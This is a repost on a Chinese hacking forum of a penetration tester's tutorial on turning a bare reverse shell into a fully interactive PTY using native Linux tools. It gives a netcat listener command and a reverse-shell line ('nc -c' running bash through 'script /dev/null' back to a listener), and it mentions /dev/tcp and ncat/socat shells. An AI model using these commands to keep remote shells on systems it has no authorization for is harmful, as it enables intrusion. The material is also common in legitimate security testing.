搜索
查看: 634|回复: 0

Hacking: Getting a functional TTY from a reverse shell.

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2017-11-17 17:40:04 | 显示全部楼层 |阅读模式
from:https://steemit.com/hacking/@syn ... rom-a-reverse-shell

Note: This is the first in a series of hacking-related posts I'll be writing. My day job is security research/penetration testing, so I figured I'd share some of my notes here...
One of my least favourite things when hacking is dealing with shit reverse connect shells that have no job control, no proper TTY, etc, where I cannot do things like use vim, or su, or send a CTRL+C without either seriously fucking up the shell or just losing the backconnect and having to start from scratch.
This problem could easily be solved simply by uploading, for example, one of my reverse-pty Python scripts (https://github.com/infodox/python-pty-shells), however sometimes the target host is an internet of shit device or just has not got Python installed.
For these situations, I came across a super neat trick that relies entirely on native Linux utilities to pop a functioning PTY shell where you can run "su", use vim, have functioning job control, and hit CTRL+C all day without accidentally killing the shell!
On your listener end, do the following:
  1. stty -echo raw; nc -lp 1337; stty sane
复制代码
reset

The "stty -echo raw" command tells your terminal to not echo characters, and set I/O to raw mode, basically. This is followed by a normal netcat listener, and then a "stty sane" command, which resets your terminal back to normal once the netcat listener exits.
On the other side (the "hacked" computer), we have a few options. The one I use in the screenshot attached is quite simple:
  1. nc -c '/bin/bash -c "script /dev/null"' 127.0.0.1 1337
复制代码
What "script /dev/null" does here, is it runs the "script" terminal logging command, telling it to write output to "/dev/null". This allocates a PTY for you automatically. Now we can run sudo, su, vi, nano, send CTRL+C, and be generally comfortable.
Now, sometimes you don't have the option to run something like that netcat command on the pwned-host end, and you are stuck with a backconnect like when you get a "/dev/tcp" shell, and cannot pass it some nice arguments. What you do in that case is also simple. When the reverse shell connects, type in "script /dev/null" and send CTRL+J. When typing in "script /dev/null", due to echo being turned off, you may not see any output. However, once you send the ^J, your shell will pop.
Follow this up by setting the TERM variable to xterm or linux or whatever, and carry on about your business. This also fixes up reverse PTY shells where the terminal sizes seem to be messed up.
Screenshot:
For the discerning hacker, who wants SSL/TLS encryption on their shells, you can use ncat (from nmap) with the --ssl argument on both ends instead of netcat, however ncat being installed is less likely.
You can also use socat, or myriad other tools, but that is out of scope for this post. If there is demand, I can always write up some stuff on using socat for various awesome things later.
Let me know your thoughts. If anyone has any requests for security/programming related content, let me know in the comments and I will see if I can service the demand. I'm aiming to make a couple of posts a week of various stuff that I have in my "notes" files of various tricks learned on the job.

过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表